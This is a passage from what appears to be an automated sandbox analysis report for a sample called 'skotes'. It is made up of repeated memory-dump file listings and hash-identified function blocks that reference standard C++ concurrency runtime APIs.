                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                          • Opcode ID: b0908845b83593f03dadfbcea5fc13284794e6f98e2a4730159e729188f7b31d
                                                                                                                                                                                                                                          • Instruction ID: cb4f1a291781079d4fd9f41c5bc91a7ac11634827fc298728f32f2196dbca319
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0908845b83593f03dadfbcea5fc13284794e6f98e2a4730159e729188f7b31d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19212735B046159BCB54AB6CC895ABCB3E6FF96334F0409AAE411872E1CF68EC41CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 00B9AEEA
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B9AF0F
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00B9AF4E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pExecutionResource
                                                                                                                                                                                                                                          • API String ID: 1772865662-359481074
                                                                                                                                                                                                                                          • Opcode ID: 0edaeb9f77e0f6f21809e1c69ad003384985ac21cb13618f9d1193f2afbe8548
                                                                                                                                                                                                                                          • Instruction ID: 5588b73e1c9c90b88b937f10a4c7770aad99d1f7c2a25e29c01dc6845e1050e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0edaeb9f77e0f6f21809e1c69ad003384985ac21cb13618f9d1193f2afbe8548
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 802194756402059BCF08FF68C892BADB7E5BF88310F1440A9F505AB392DBB4AE15CB95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B94F24
                                                                                                                                                                                                                                          • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00B94F66
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                          • API String ID: 2663199487-3650809737
                                                                                                                                                                                                                                          • Opcode ID: 62d961dd595c8cc5c781f6b564d0c20e93ba302cb9d86f6ef1a49c3356ee1a59
                                                                                                                                                                                                                                          • Instruction ID: b7441faa781801f6a62eeb4eb0c76a562a9c7793b4077ebbda0e7c010390a25f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62d961dd595c8cc5c781f6b564d0c20e93ba302cb9d86f6ef1a49c3356ee1a59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59217135600515EFCF14EFA8C892EAD77F5FF49310F1040ADE506976A1DB71AA02CB51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B9BA0E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                          • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                                                          • API String ID: 348560076-3997890769
                                                                                                                                                                                                                                          • Opcode ID: edff32dd94d64666a2a32f7e7518afb609338dedd85c348e4fe75e1693fbfdd7
                                                                                                                                                                                                                                          • Instruction ID: c64c0c6cbdc2a1fe0ddda038d3788462167459add0f2a4ecd507274950e0e0f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edff32dd94d64666a2a32f7e7518afb609338dedd85c348e4fe75e1693fbfdd7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87012220481315A9EF20FBB96D02FAB31CCCF03308F201DBAB540E2281EFA4D80042A6
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 00B96E73
                                                                                                                                                                                                                                            • Part of subcall function 00B94E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B94E7F
                                                                                                                                                                                                                                            • Part of subcall function 00B94E6E: List.LIBCMT ref: 00B94E89
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B96E85
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B96EAA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
